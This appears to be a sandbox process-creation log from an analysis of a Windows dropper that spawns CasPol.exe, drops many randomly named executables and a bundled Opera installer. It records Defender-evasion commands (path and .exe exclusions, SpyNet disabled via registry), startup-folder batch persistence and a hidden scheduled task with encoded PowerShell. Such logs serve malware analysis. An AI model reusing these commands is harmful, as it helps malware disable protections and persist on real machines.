Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe "C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe "C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe" --silent --allusers=0
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6cf674f0,0x6cf67500,0x6cf6750c
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe "C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\r1O81gOTKkD0PfSdUigHGcl2.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\r1O81gOTKkD0PfSdUigHGcl2.exe" --version
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\8AbV0HUy7VtZhy8wnNLXmsko.exe "C:\Users\user\Pictures\8AbV0HUy7VtZhy8wnNLXmsko.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe "C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe "C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe"
Source: C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSCD80.tmp\Install.exe .\Install.exe
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe "C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2284 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231121151234" --session-guid=0bda333d-4994-4b67-9b59-0f927372c94a --server-tracking-blob=ZDUxMWEyYzQyYmU3YjNmMDI3NzRlNWM2YTg1YzY1MzdlNGQ4ZGExMzhjNzg4MGQyMThiMzI4OGVlZWIyNTVmNDp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMDU3NTk0OS4yNzIzIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI5ZjZlMmVjMS0wNzBjLTRmYWEtODc4OS01ZWEyMjQ2NDhkMTUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7005000000000000
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c4774f0,0x6c477500,0x6c47750c
Source: C:\Users\user\AppData\Local\Temp\7zSCD80.tmp\Install.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe .\Install.exe /eeGFndidj "385121" /S
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4aBHXrK8XjSbEjiL1WIQ7Kmf.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\QsTe5POhA2TpmBwMLub9ymVB.exe "C:\Users\user\Pictures\QsTe5POhA2TpmBwMLub9ymVB.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe "C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe "C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe" --silent --allusers=0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\TNpJBjREJ9Gyf03FTGsVwgMm.exe "C:\Users\user\Pictures\TNpJBjREJ9Gyf03FTGsVwgMm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\6Y6HZLXw0Y38mRwaQb51f9Xr.exe "C:\Users\user\Pictures\6Y6HZLXw0Y38mRwaQb51f9Xr.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe "C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe "C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe"
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\HLT0AIxjEwuNSfgdyWiT3ueK.exe "C:\Users\user\Pictures\HLT0AIxjEwuNSfgdyWiT3ueK.exe"
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSD77.tmp\Install.exe .\Install.exe
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe "C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe" --silent --allusers=0
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	Process created: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6b3d74f0,0x6b3d7500,0x6b3d750c
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\loKi89nha4JKgsufhuKQ22oF.exe "C:\Users\user\Pictures\loKi89nha4JKgsufhuKQ22oF.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe "C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AS0hnlpl66MtE0KLhjjOLNaC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gXUhwMAMn" /SC once /ST 08:40:27 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe "C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe "C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe "C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe" --silent --allusers=0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe "C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\8AbV0HUy7VtZhy8wnNLXmsko.exe "C:\Users\user\Pictures\8AbV0HUy7VtZhy8wnNLXmsko.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe "C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe "C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\QsTe5POhA2TpmBwMLub9ymVB.exe "C:\Users\user\Pictures\QsTe5POhA2TpmBwMLub9ymVB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe "C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe" --silent --allusers=0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\TNpJBjREJ9Gyf03FTGsVwgMm.exe "C:\Users\user\Pictures\TNpJBjREJ9Gyf03FTGsVwgMm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\6Y6HZLXw0Y38mRwaQb51f9Xr.exe "C:\Users\user\Pictures\6Y6HZLXw0Y38mRwaQb51f9Xr.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe "C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe "C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\HLT0AIxjEwuNSfgdyWiT3ueK.exe "C:\Users\user\Pictures\HLT0AIxjEwuNSfgdyWiT3ueK.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe "C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe" --silent --allusers=0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\loKi89nha4JKgsufhuKQ22oF.exe "C:\Users\user\Pictures\loKi89nha4JKgsufhuKQ22oF.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe "C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe "C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4aBHXrK8XjSbEjiL1WIQ7Kmf.bat" "	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6cf674f0,0x6cf67500,0x6cf6750c
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\r1O81gOTKkD0PfSdUigHGcl2.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\r1O81gOTKkD0PfSdUigHGcl2.exe" --version
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe "C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2284 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231121151234" --session-guid=0bda333d-4994-4b67-9b59-0f927372c94a --server-tracking-blob=ZDUxMWEyYzQyYmU3YjNmMDI3NzRlNWM2YTg1YzY1MzdlNGQ4ZGExMzhjNzg4MGQyMThiMzI4OGVlZWIyNTVmNDp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMDU3NTk0OS4yNzIzIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI5ZjZlMmVjMS0wNzBjLTRmYWEtODc4OS01ZWEyMjQ2NDhkMTUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7005000000000000
Source: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
